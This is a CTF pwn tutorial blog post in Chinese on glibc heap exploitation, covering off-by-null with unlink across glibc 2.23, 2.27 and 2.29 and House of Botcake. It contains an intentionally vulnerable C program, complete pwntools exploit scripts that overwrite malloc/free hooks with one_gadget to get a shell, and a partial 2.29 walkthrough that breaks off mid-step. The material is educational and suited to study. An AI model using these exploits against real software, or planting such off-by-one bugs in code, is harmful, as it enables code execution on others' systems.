Heap中的off-by-null+unlink(House Of Botcake)

CTF-PWN

发布日期: 2020-12-06

文章字数: 5.6k

阅读时长: 28 分

阅读次数:

个人看法

因为比较难的堆题，是不会轻易让你获得chunk overlapping的，而堆的overlapping(堆溢出，chunk extending，他们的目的都差不多)是heap题中任意读写的非常重要的一个条件。
而off-by-null是比较常见的漏洞，但利用起来还是有点难度。off-by-null一般将后面chunk的size位最低单字节置零，所以想要进行利用就要求被覆盖的chunk是smallchunk(size向0x100对齐),这样就绕过某些检查。(如果size没有0x100对齐如0x120，将会把20都覆盖)
那么将当前chunk物理相邻的下一个chunk的prev_inuse位成功置零了又有什么用呢？我们知道nextchunk的prev_inuse位是用来判断前一个chunk是否处于使用状态，通常与nextchunk.prev_size配合进行chunk合并，这时候就会用到unlink。合理的构造chunk就可以用off-by-null和unlink配合实现chunk overlapping。

glibc2.23

glibc2.23下主要绕过的检查：

当前free对象不是top
```
if (__glibc_unlikely (p == av->top))
```

下一个chunk地址是否在heap内

if (__builtin_expect (contiguous (av) && (char *) nextchunk >= ((char *) av->top + chunksize(av->top)), 0))

检查nextchunk的prev_inuse位是否为1

if (__glibc_unlikely (!prev_inuse(nextchunk)))

检查nextchunk的size是否合理

if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0) || __builtin_expect (nextsize >= av->system_mem, 0))

一般构造方法：(当然没有万能的构造方法，就像数学中没有万能的公式，具体视情况而定)

将A释放，这样就会在其fd，bk中填入unsortedbin表头，绕过unlink的指向检查
在B中利用off-by-null覆盖C的prev_inuse位，并且在BC重叠部分即C的prev_size写入A+B的大小(例如0xb0；下文glibc2.23的EXP中该值为0x100，glibc2.27的EXP中为0xb0).
当然这里的B可以根据实际需求改变大小，最常见的就是用于fastbin attack获取malloc或者free hook的读写权
free C chunk，进行unlink达成chunk overlapping，最终chunk放在unsortedbin
D用于防止unsortedbin chunk与top chunk合并

其实这就是House of Einherjar的一种变形，HOE中只要控制C中的prev_inuse=0和prev_size大小就可以malloc任意地址的chunk，其中的一个重要条件就是要泄露地址并在fake_chunk中的fd，bk字段填入指向自己的地址。而这个条件可以通过将 free A进入unsortedbin中达成，只不过这里malloc获取的地址仅限于heap。

例子

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
/* One slot of the global table that the menu handlers operate on. */
struct chunk{
    long *point;        /* buffer returned by malloc() in add(); set to 0 by delete() */
    unsigned int size;  /* size requested in add(); edit() passes it to read() as the length */
}chunks[10];            /* handlers reject any index >= 10 */

/*
 * Menu option 1: read a slot index and a size, malloc() a buffer of that
 * size and record the pointer and the size in chunks[index].
 *
 * The process exits when the input is not a number, the index is >= 10,
 * or malloc() fails.  A slot that is already in use is overwritten
 * without freeing the old buffer, exactly as before.
 */
void add()
{
    unsigned int index = 0;
    unsigned int size = 0;
    puts("Index?");
    /* %u matches the unsigned variable; a failed conversion is rejected
       instead of silently continuing with the initial value. */
    if(scanf("%u",&index)!=1 || index>=10)
    {
        puts("Wrong index!");
        exit(0);
    }
    puts("Size");
    if(scanf("%u",&size)!=1)
    {
        puts("Wrong size!");
        exit(0);
    }
    chunks[index].point=malloc(size);
    if(!chunks[index].point)
    {
        perror("malloc");
        exit(0);
    }
    chunks[index].size=size;
}

/*
 * Menu option 2: read a slot index and print the buffer stored there
 * as a C string with puts().
 *
 * The process exits when the input is not a number, the index is >= 10,
 * or the slot is empty.
 */
void show()
{
    unsigned int index=0;
    puts("Index?");
    /* Reject unparsable input as well as out-of-range indices.  The old
       perror("size") printed an unrelated errno message here; use the
       same plain message as the other handlers. */
    if(scanf("%u",&index)!=1 || index>=10)
    {
        puts("Wrong index");
        exit(0);
    }
    if(!chunks[index].point)
    {
        puts("It`s empty!");
        exit(0);
    }
    puts((const char*)chunks[index].point);
}

/*
 * Menu option 3: read a slot index, then read up to chunks[index].size
 * bytes from stdin into the slot's buffer and NUL-terminate the data.
 *
 * The process exits when the input is not a number, the index is >= 10,
 * or the slot is empty.
 */
void edit()
{
    unsigned int index=0;
    puts("Index?");
    /* Reject unparsable input as well as out-of-range indices. */
    if(scanf("%u",&index)!=1 || index>=10)
    {
        puts("Wrong index");
        exit(0);
    }
    if(!chunks[index].point)
    {
        puts("It`s empty!");
        exit(0);
    }
    char *p=(char *)chunks[index].point;
    puts("content");
    /* INTENTIONAL BUG (the point of this demo): when read() fills the whole
       buffer, the terminator lands one byte past it -> off-by-null. */
    p[read(0,chunks[index].point,chunks[index].size)]=0;
}

/*
 * Menu option 4: read a slot index, free() the buffer stored there and
 * clear the slot (pointer and size) so it cannot be reused after free.
 *
 * The process exits when the input is not a number, the index is >= 10,
 * or the slot is empty.
 */
void delete()
{
    unsigned int index=0;
    puts("Index?");
    /* Reject unparsable input as well as out-of-range indices. */
    if(scanf("%u",&index)!=1 || index>=10)
    {
        puts("Wrong index");
        exit(0);
    }
    if(!chunks[index].point)
    {
        puts("It`s empty");
        exit(0);
    }
    free(chunks[index].point);
    chunks[index].point = 0;
    chunks[index].size = 0;
    puts("done!");
}

/* Print the four menu entries followed by the "Choice?" prompt, one per line. */
void menu()
{
    static const char *const entries[] = {
        "1)add a chunk",
        "2)show content",
        "3)edit a chunk",
        "4)delete a chunk",
        "Choice?",
    };
    unsigned int i;

    for(i = 0; i < sizeof(entries)/sizeof(entries[0]); i++)
        puts(entries[i]);
}

/*
 * Entry point: print the banner, then loop forever showing the menu and
 * dispatching the chosen action.  Any choice other than 1-4, or input
 * that is not a number (including EOF), terminates the process.
 *
 * NOTE(review): stdio buffering is deliberately left untouched; adding
 * setbuf() would presumably change the heap layout the exploits below
 * were written against -- confirm before changing it.
 */
int main(void)
{
    unsigned int choice = 0;
    puts("Welcome to my off-by-null test");
    puts("wish your luck");
    while(1){
        menu();
        /* Without this check a failed scanf() leaves `choice` unchanged
           and the loop keeps repeating the previous action forever. */
        if(scanf("%u",&choice)!=1)
            exit(0);
        switch(choice){
        case 1:
            add();
            break;
        case 2:
            show();
            break;
        case 3:
            edit();
            break;
        case 4:
            delete();
            break;
        default:
            exit(0);
        }
    }
    return 0;
}

EXP

#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-                           
#Author: Squarer
#Time: 2020.12.03 20.06.20
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*

context.arch = 'amd64'

def add(index,size):
    """Menu option 1: allocate `size` bytes into slot `index` of the target."""
    dialogue = (
        ('Choice?\n', '1'),
        ('Index?\n', str(index)),
        ('Size\n', str(size)),
    )
    for prompt, answer in dialogue:
        sh.sendlineafter(prompt, answer)

def edit(index,cont):
    """Menu option 3: write `cont` (plus the newline added by sendline) into slot `index`.

    `cont` is passed to pwntools unchanged.  The previous ``str(cont)`` was a
    no-op on Python 2 but turns a bytes payload (e.g. one built with p64())
    into its ``"b'...'"`` repr on Python 3, corrupting the data sent.
    """
    sh.sendlineafter('Choice?\n','3')
    sh.sendlineafter('Index?\n',str(index))
    sh.sendlineafter('content\n',cont)

def delete(index):
    """Menu option 4: free the chunk held in slot `index`."""
    for prompt, answer in [('Choice?\n', '4'), ('Index?\n', str(index))]:
        sh.sendlineafter(prompt, answer)

def show(index):
    """Menu option 2: ask the target to print slot `index`; the caller reads the output."""
    slot = str(index)
    steps = {'Choice?\n': '2', 'Index?\n': slot}
    for prompt in ('Choice?\n', 'Index?\n'):
        sh.sendlineafter(prompt, steps[prompt])

def show_addr(name,addr):
    """Log `addr` in hex, labelled with `name`, through the pwntools logger."""
    message = 'The %s Addr:%s' % (name, hex(addr))
    log.success(message)


# Remote target (placeholders -- replace with the real service address).
host = '1.1.1.1'
port = 10000
# 1: attack the local binary, 0: connect to host:port.
local = 1
if local:
    context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    sh = process('./by-null1')
else:
    #context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    # Previously the literal strings 'host' and 'port' were passed here.
    sh = remote(host,port)



def pwn():
    """Exploit the glibc 2.23 build: off-by-null + unlink -> overlapping chunks -> fastbin attack.

    Every step depends on the heap state left by the previous one, so the
    order of the calls must not be changed.  The numeric libc offsets are
    hard-coded for the author's libc.
    """
    add(0,0x80)        #A: freed first so its fd/bk hold the unsorted bin head
    add(1,0x68)        #B: its last byte overflows into C's size field
    add(2,0xf0)        #C: chunk size 0x100, so only the PREV_INUSE bit is cleared
    add(3,0x10)        #D: keeps the merged chunk away from top

    delete(0)
    # Fill B completely: the last 8 bytes become C's prev_size (0x100) and the
    # terminating NUL written by edit() clears C's PREV_INUSE bit.
    padding = 'A'*0x60 + p64(0x100)
    edit(1,padding)
    # Freeing C now consolidates backwards over A and B (B is still in use).
    delete(2)
    # Take the whole merged chunk back; it overlaps B.
    add(0,0x1f0)
    show(0)
    # presumably the leaked pointer is main_arena+0x58 (unsorted bin head) -- verify for your libc
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3c4b20 - 0x58
    show_addr('libc_addr',libc_addr)
    free_hook = libc_addr + libc.sym['__free_hook']
    show_addr('free_hook',free_hook)
    system = libc_addr + libc.sym['system']
    show_addr('system',system)
    # NOTE(review): looks like the usual fake fastbin chunk just before __malloc_hook -- confirm offset
    fake_chunk = libc_addr + 0x3c4aed
    show_addr('fake_chunk',fake_chunk)
    # presumably one_gadget offsets for the author's libc -- verify
    onegad = [0x45226,0x4527a,0xf0364,0xf1207]
    onegadget = libc_addr + onegad[3]

    # Put B into the 0x70 fastbin, then rewrite its header and fd through the
    # overlapping chunk 0 so that the fastbin list continues at fake_chunk.
    delete(1)
    payload = 'A'*0x80 + p64(0x90) + p64(0x71) + p64(fake_chunk)
    edit(0,payload)
    add(1,0x68)        # returns B again
    #gdb.attach(sh)
    add(2,0x68)        # returns the fake chunk
    payload = 'A'*0x13 + p64(onegadget)
    edit(2,payload)
    # The next allocation is expected to reach the overwritten hook.
    add(7,0x10);
    #gdb.attach(sh)
'''
Fake chunk | Allocated chunk
Addr: 0x7f5b8cf8b795
prev_size: 0x00
size: 0x00
fd: 0x00
bk: 0x7f
fd_nextsize: 0x00
bk_nextsize: 0x5b8d198700000000
'''    

# Script entry point: run the exploit, then hand the session over to the user.
if __name__ == '__main__':
    pwn()
    sh.interactive()

glibc2.27

主要区别就是来了一个更加vulnerable的数据结构：tcache。还是用上面的构造方法：

只不过，由于tcache机制我们需要提前将0x90block和0x100block填满，这样新释放的chunk才会进入unsortedbin中，进行合并。除了这里麻烦了一点其他都还好，在完成chunk overlapping之后free B就可以直接篡改其next字段进行tcache attack。所以这里并不需要对Bchunk进行专门的申请

例子还是以上面的源码为例，改为glibc2.27下的环境

EXP

#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-                           
#Author: Squarer
#Time: 2020.12.03 20.06.20
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*

context.arch = 'amd64'

def add(index,size):
    """Menu option 1: allocate `size` bytes into slot `index` of the target."""
    dialogue = (
        ('Choice?\n', '1'),
        ('Index?\n', str(index)),
        ('Size\n', str(size)),
    )
    for prompt, answer in dialogue:
        sh.sendlineafter(prompt, answer)

def edit(index,cont):
    """Menu option 3: write `cont` (plus the newline added by sendline) into slot `index`.

    `cont` is passed to pwntools unchanged.  The previous ``str(cont)`` was a
    no-op on Python 2 but turns a bytes payload (e.g. one built with p64())
    into its ``"b'...'"`` repr on Python 3, corrupting the data sent.
    """
    sh.sendlineafter('Choice?\n','3')
    sh.sendlineafter('Index?\n',str(index))
    sh.sendlineafter('content\n',cont)

def delete(index):
    """Menu option 4: free the chunk held in slot `index`."""
    for prompt, answer in [('Choice?\n', '4'), ('Index?\n', str(index))]:
        sh.sendlineafter(prompt, answer)

def show(index):
    """Menu option 2: ask the target to print slot `index`; the caller reads the output."""
    slot = str(index)
    steps = {'Choice?\n': '2', 'Index?\n': slot}
    for prompt in ('Choice?\n', 'Index?\n'):
        sh.sendlineafter(prompt, steps[prompt])

def show_addr(name,addr):
    """Log `addr` in hex, labelled with `name`, through the pwntools logger."""
    message = 'The %s Addr:%s' % (name, hex(addr))
    log.success(message)


# Remote target (placeholders -- replace with the real service address).
host = '1.1.1.1'
port = 10000
# 1: attack the local binary, 0: connect to host:port.
local = 1
if local:
    #context.log_level = 'debug'
    libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')
    sh = process('./by-null1_2.27')
else:
    #context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    # Previously the literal strings 'host' and 'port' were passed here.
    sh = remote(host,port)



def pwn():
    """Exploit the glibc 2.27 build: off-by-null + unlink -> overlapping chunks -> tcache poisoning.

    Every step depends on the heap state left by the previous one, so the
    order of the calls must not be changed.  The numeric libc offsets are
    hard-coded for the author's libc.
    """
    add(0,0x80)    # A
    add(1,0x18)    # B: its last byte overflows into C's size field
    add(2,0xf0)    # C: chunk size 0x100, so only the PREV_INUSE bit is cleared
    # Fill the 0x90 and the 0x100 tcache bins (7 entries each) so that
    # freeing A and C later bypasses tcache.
    for i in range(7):
        add(i+3,0x80)
    for i in range(7):
        delete(i+3)
        add(i+3,0xf0)
    for i in range(7):
        delete(i+3)

    delete(0)
    # Fill B completely: the last 8 bytes become C's prev_size (0xb0) and the
    # terminating NUL written by edit() clears C's PREV_INUSE bit.
    padding = 'A'*0x10+p64(0xb0)

    edit(1,padding)
    # Freeing C now consolidates backwards over A and B (B is still in use).
    delete(2)
    # Carve a chunk out of the merged region; it covers A and B.
    add(0,0xa0)
    show(0)
    # presumably a main_arena bin pointer left behind in the chunk -- verify offsets for your libc
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x200 - 0x3afc40
    show_addr('libc_addr',libc_addr)
    # presumably one_gadget offsets for the author's libc -- verify
    onegad = [0x41612,0x41666,0xdeed2]
    onegadget = libc_addr + onegad[2]
    show_addr('onegadget',onegadget)
    fake_chunk = libc_addr + libc.sym['__malloc_hook']
    show_addr('fake_chunk',fake_chunk)


    # Free B into the 0x20 tcache bin, then rewrite its header and next
    # pointer through the overlapping chunk 0 so the list continues at
    # __malloc_hook.
    payload = 'A'*0x80 + p64(0x90) + p64(0x21) + p64(fake_chunk)
    delete(1)
    edit(0,payload)
    add(6,0x18)    # returns B again
    add(7,0x18)    # returns __malloc_hook
    payload = p64(onegadget)
    edit(7,payload)
    # The next malloc() call goes through the overwritten hook.
    add(8,0x10)
    #gdb.attach(sh)
'''
Fake chunk | Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x7f56e94b9c0d
prev_size: 0x7f
size: 0x56e918b51000007f
fd: 0x7f
bk: 0x56e918afc0000000
fd_nextsize: 0x56e94b5d60000000
bk_nextsize: 0x00
'''

    #delete(2)

# Script entry point: run the exploit, then hand the session over to the user.
if __name__ == '__main__':
    pwn()
    sh.interactive()

glibc2.29

这个就比较难，增加了新的检查机制，先得了解。

tcache结构和成员函数变化

//glibc-2.29
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;

//glibc-2.27
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

new：

tcache_entry结构体中新增key指针

pwndbg> parseheap 
addr                prev                size                 status              fd                bk                
0x602000            0x0                 0x250                Used                None              None
0x602250            0x0                 0x30                 Freed                0x0              None
pwndbg> x/8gx 0x602250
0x602250:    0x0000000000000000    0x0000000000000031
0x602260:    0x0000000000000000    0x0000000000602010   <===========是tcache结构体地址
0x602270:    0x0000000000000000    0x0000000000000000
0x602280:    0x0000000000000000    0x0000000000020d81

//glibc-2.29
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
   e->key = tcache;    //new

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;    //new
  return (void *) e;
}
//glibc-2.27
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

new：

tcache chunk插入时，在chunk中的key字段写入tcache结构体地址
tcache chunk取出时，将chunk中的key字段清空

我感觉这个key检测很像stack中的cookie检测，自然伪造是一种方法，其主要防止double free

_int_free

//glibc-2.29
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
      {
    /* Check to see if it's already in the tcache.  */ 
        tcache_entry *e = (tcache_entry *) chunk2mem (p);

    /* This test succeeds on double free.  However, we don't 100%
       trust it (it also matches random payload data at a 1 in
       2^<size_t> chance), so verify it's not an unlikely
       coincidence before aborting.  */
    if (__glibc_unlikely (e->key == tcache))  //检查double  free
      {
        tcache_entry *tmp;
        LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
        for (tmp = tcache->entries[tc_idx];
         tmp;
         tmp = tmp->next)
          if (tmp == e)
            malloc_printerr ("free(): double free detected in tcache 2");
        /* If we get here, it was a coincidence.  We've wasted a
           few cycles, but don't abort.  */
      }

    if (tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
      }
  }

//glibc-2.27
{
    size_t tc_idx = csize2tidx (size);
    if (tcache//free+172
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }

new：

在free一个tcache范围内的chunk时会先判断该chunk的key字段是否等于tcache地址，如果不等于，则和glibc2.27一样的操作
- 如果等于，则遍历对应bins中的每一个chunk，看是否与当前chunk地址相等。所以如果执行了这个判断很多tcache attack就很难进行

unlink

//glibc-2.29
/*低地址合并*/
if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))    //new
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

//glibc-2.27
if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }

new：

在进行unlink前会进行判断：进行free的chunk，其prevsize字段要等于低地址chunk的size

一种方法是如果off by one溢出的那个字节可以控制，需要将合并的chunk的size改大，使其越过在其下面若干个chunk，满足size==prevsize的条件，还是可以形成chunk overlapping的。但因为off by null只可能把size改小，所以如果不能控制溢出的字节，就无法构造chunk overlapping了。

_int_malloc–unsortedbin

//glibc-2.29
            mchunkptr next = chunk_at_offset (victim, size);

          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
            malloc_printerr ("malloc(): invalid next size (unsorted)");
          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
          if (__glibc_unlikely (bck->fd != victim)
              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
            malloc_printerr ("malloc(): unsorted double linked list corrupted");
          if (__glibc_unlikely (prev_inuse (next)))
            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

new：

nextchunk的size字段在合理范围
当前要取出的unsortedbin chunk其size要等于nextchunk的prev_size
倒数第二个free chunk其fd回指要取出的chunk(victim),且victim的fd回指unsorted bin表头
- 这对unsortedbin attack造成了很大影响，很难利用了
nextchunk的prev_inuse位为0

为了应对这些检查机制，大佬们总结了一个方法

House Of Botcake

用how2heap中例子：

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>


int main()
{
    /*
     * This attack should bypass the restriction introduced in
     * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d
     * If the libc does not include the restriction, you can simply double free the victim and do a
     * simple tcache poisoning
     * And thanks to @anton00b and @subwire for the weird name of this technique */

    // disable buffering so _IO_FILE does not interfere with our heap
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    // introduction
    puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into");
    puts("returning a pointer to an arbitrary location (in this demo, the stack).");
    puts("This attack only relies on double free.\n");

    // prepare the target
    intptr_t stack_var[4];
    puts("The address we want malloc() to return, namely,");
    printf("the target address is %p.\n\n", stack_var);

    // prepare heap layout
    puts("Preparing heap layout");
    puts("Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later.");
    intptr_t *x[7];
    for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
        x[i] = malloc(0x100);
    }
    puts("Allocating a chunk for later consolidation");
    intptr_t *prev = malloc(0x100);
    puts("Allocating the victim chunk.");
    intptr_t *a = malloc(0x100);
    printf("malloc(0x100): a=%p.\n", a); 
    puts("Allocating a padding to prevent consolidation.\n");
    malloc(0x10);

    // cause chunk overlapping
    puts("Now we are able to cause chunk overlapping");
    puts("Step 1: fill up tcache list");
    for(int i=0; i<7; i++){
        free(x[i]);
    }
    puts("Step 2: free the victim chunk so it will be added to unsorted bin");
    free(a);

    puts("Step 3: free the previous chunk and make it consolidate with the victim chunk.");
    free(prev);

    puts("Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n");
    malloc(0x100);
    /*VULNERABILITY*/
    free(a);// a is already freed
    /*VULNERABILITY*/

    // simple tcache poisoning
    puts("Launch tcache poisoning");
    puts("Now the victim is contained in a larger freed chunk, we can do a simple tcache poisoning by using overlapped chunk");
    intptr_t *b = malloc(0x120);
    puts("We simply overwrite victim's fwd pointer");
    b[0x120/8-2] = (long)stack_var;

    // take target out
    puts("Now we can cash out the target chunk.");
    malloc(0x100);
    intptr_t *c = malloc(0x100);
    printf("The new chunk is at %p\n", c);

    // sanity check
    assert(c==stack_var);
    printf("Got control on target/stack!\n\n");

    // note
    puts("Note:");
    puts("And the wonderful thing about this exploitation is that: you can free b, victim again and modify the fwd pointer of victim");
    puts("In that case, once you have done this exploitation, you can have many arbitary writes very easily.");

    return 0;
}

环境为glibc2.29。

步骤：

通过7次malloc和7次free填满对应tcache bins
malloc(0x100):prev 为chunk合并的触发器
malloc(0x100):a作为victim chunk，操作目标
malloc(0x10)防止与top合并

对应堆分布：当程序执行完free(a)

            unsortbin: 0x603ad0 (size : 0x110)
(0x110)   tcache_entry[15](7): 0x6038c0 --> 0x6037b0 --> 0x6036a0 --> 0x603590 --> 0x603480 --> 0x603370 --> 0x603260

当执行free(prev)：
chunk a 与chunk prev进行合并，要注意prev在低地址

            unsortbin: 0x6039c0 (size : 0x220)  //<======
(0x110)   tcache_entry[15](7): 0x6038c0 --> 0x6037b0 --> 0x6036a0 --> 0x603590 --> 0x603480 --> 0x603370 --> 0x603260

当执行malloc(0x100)：
0x110 tcache_entry就空出来一个

            unsortbin: 0x6039c0 (size : 0x220)
(0x110)   tcache_entry[15](6): 0x6037b0 --> 0x6036a0 --> 0x603590 --> 0x603480 --> 0x603370 --> 0x603260

当执行free(a):
这次是a的double free，由于0x110 tcache_entry有空余，所以a被立即放入tcache，不会进行下面的检查(double free)，这样a就同时在tcache链表中和unsortedbin 0x220chunk中

之后便是常规操作了：

malloc一个大于 0x110的chunk，这样就会从unsortedbin中切割，获取free chunk a的next字段写的权限
篡改next，指向任意地址(此处指向stack)即可实现任意地址读写
- key的插入仅在向tcache中插入free chunk中起到double free检查的功能，其他还是老样子

该House方案归根结底还是针对tcache的弱检查性，提供了篡改free tcache chunk的next字段的方法。
其主要部分是：

chunk overlapping
通过将free chunk放入tcache绕过后续的检查

glibc2.29下的off-by-null

首先我们回到问题的出发点：为什么要用off-by-null? 答案显而易见：为了实现chunk overlapping。不过glibc对于该方法给出了解决措施：

每次进行unlink时都会检查目标chunk的size和当前chunk的prev_size是否相等
虽然给我们的利用带来了很大的不便，但也不是完全不可能。

由Ex师傅给出的方案

其核心思想是：既然会比对prev_size和size，由于size比较难修改(除非有比较明显的堆溢出)那么不妨构造一个fake_chunk那么其size就是我们可控的了，接下来的任务就是安排相关指针绕过unlink，最后与高地址chunk里应外合，实现chunk overlapping。

步骤一

获得一个freed large chunk(largebin中仅一个chunk)
然后从该large chunk中分割得到一个chunkA，这样chunkA内部就有4个残留指针
继续在chunkA中构造fake_chunkB
- 其中关键在于Bsize计算(与之后的prev_size里应外合)，覆盖fd_next指向一个有残留heap指针的chunk(比如smallbins，unsortedbin中具有多个chunk时即可获得)
- 因为chunkA的fd字段原来是一个~libc地址，无法覆盖为一个合适的位置来绕过unlink，先随便填充

步骤二

获取可控BK_chunk的使用权(malloc出来，或者一开始就malloc如果有edit功能的话)，并覆盖bk段指向fake_chunk
接下来就是想办法把chunkA的fd字段覆盖为指向自己的指针
- 如果这里将chunkA free进入tcache链，那么其fd字段是会填入heap指针，但同时由于这是glibc2.29，Bsize(bk字段)被插入tcache地址
- 所以这里要将chunkA free进入fastbin链表，同样会在其fd字段填入heap指针，而不会改变其他内容，然后我们malloc出来再进行一次覆盖即可
最后free 目标chunk
总结
需要large chunk
需要在unsortedbin或者smallbins中的chunk，用于获取可控BK_chunk
需要可以构成fastbin链表，用于chunkA释放后插入

例子

还是以最上面的那个代码，用patchelf改为glibc2.29环境，并且先关闭ASLR进行测试

先gdb调试发现heap基址为0x555555759670，由于要进行低字节覆盖，所以off-by-null会影响指针覆盖，那么可以先把我们开始利用的heap地址提高到0x555555760000，这样我们覆盖最低字节时null字节不会造成影响。那就先malloc一个size为0x6990的chunk
同时由于需要多次构造双向链表，以及fastbin链表，我们从这个chunk中先预制7个0x30大小的chunk
然后分配一个0x500的chunkA，同时分配一个0x20大小的chunk来分割A和top，A分配完后，释放A，再申请一个更大的chunk(这里是0x600)使得A进入largebin

#step1: seven 0x30 chunks for later tcache filling, then padding so the
#       chunks used below start at a heap address whose low two bytes are zero
    for i in range(7):
        add(i,0x20)
    add(7,0x6980-0x30*7)
#step2
    add(7,0x4f0) #A, the future large chunk
    add(8,0x10)  #keeps A from merging with top
#step3
    delete(7)
    add(8,0x5f0) #larger than every free chunk, so A is moved into the largebin

heap：

                  top: 0x555555760b20 (size : 0x184e0) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0
         largebin[ 4]: 0x555555760000 (size : 0x500)  <======

再从A中获取BCD三个堆块，其中B用来构造fake_chunk，C和D用来形成双向链表，填满tcache后我们可以将D和C先后释放进入fastbin，通过触发malloc_consolidate使得C，D先后进入smallbins，这样就形成了双向链表。因此为了满足malloc_consolidate我们要将C，D，A隔开。

#step4,5
    for i in range(3):
        add(7+i,0x20) #B, C and a spacer block
    add(9,0x20)         #D, placed behind the spacer block
    #gdb.attach(sh)
    edit(7,p64(0)+p64(0xf1)+'\x30',0)  #fake chunk inside B; the '\x30' low byte was worked out in advance from the planned heap layout
#step6
    for i in range(7):
        delete(i)   #fill the 0x30 tcache bin
    add(0,0x10)     #spacer between D and the rest of A
    gdb.attach(sh)

其中fake_chunk的size可以先放着，布置好heap后再进行计算

heap：

pwndbg> x/8gx 0x555555760000
0x555555760000:    0x0000000000000000    0x0000000000000031    <====B
0x555555760010:    0x0000000000000000    0x00000000000000f1    <====fake_chunk
0x555555760020:    0x0000555555760030    0x0000555555760000
0x555555760030:    0x0000000000000000    0x0000000000000031    <====C
pwndbg> 
0x555555760040:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x555555760050:    0x0000000000000000    0x0000000000000000
0x555555760060:    0x0000000000000000    0x0000000000000031
0x555555760070:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
pwndbg> 
0x555555760080:    0x0000000000000000    0x0000000000000000
0x555555760090:    0x0000000000000000    0x0000000000000031    <=====D
0x5555557600a0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600b0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x5555557600c0:    0x0000000000000000    0x0000000000000021    <====block
0x5555557600d0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600e0:    0x0000000000000000    0x0000000000000421    <====A
0x5555557600f0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0

然后delete掉D，C。注意要先delete D，这样进入smallbin后是C先进入，其bk就会指向heap地址并且C先使用，同时C与fake_chunk相邻，地址容易覆盖(否则稍有不慎就可能地址相差大于0x100，这样off-by-null就会造成影响)，然后malloc一个largebin中的size就会触发largebin中的malloc_consolidate

    # D is freed first, so after the big malloc below both chunks sit in the
    # smallbin with C->bk == D.
    delete(9)
    delete(8)
    # Large request that triggers the fastbin consolidation.  (This line was
    # indented by one space only, which does not match the rest of the body.)
    add(0,0x500)

heap：

                  top: 0x555555761030 (size : 0x17fd0) 
       last_remainder: 0x5555557600e0 (size : 0x420) 
            unsortbin: 0x0
(0x030)  smallbin[ 1]: 0x555555760090  <--> 0x555555760030   <=======成功，前面那个是D，后面是C
         largebin[ 0]: 0x5555557600e0 (size : 0x420)
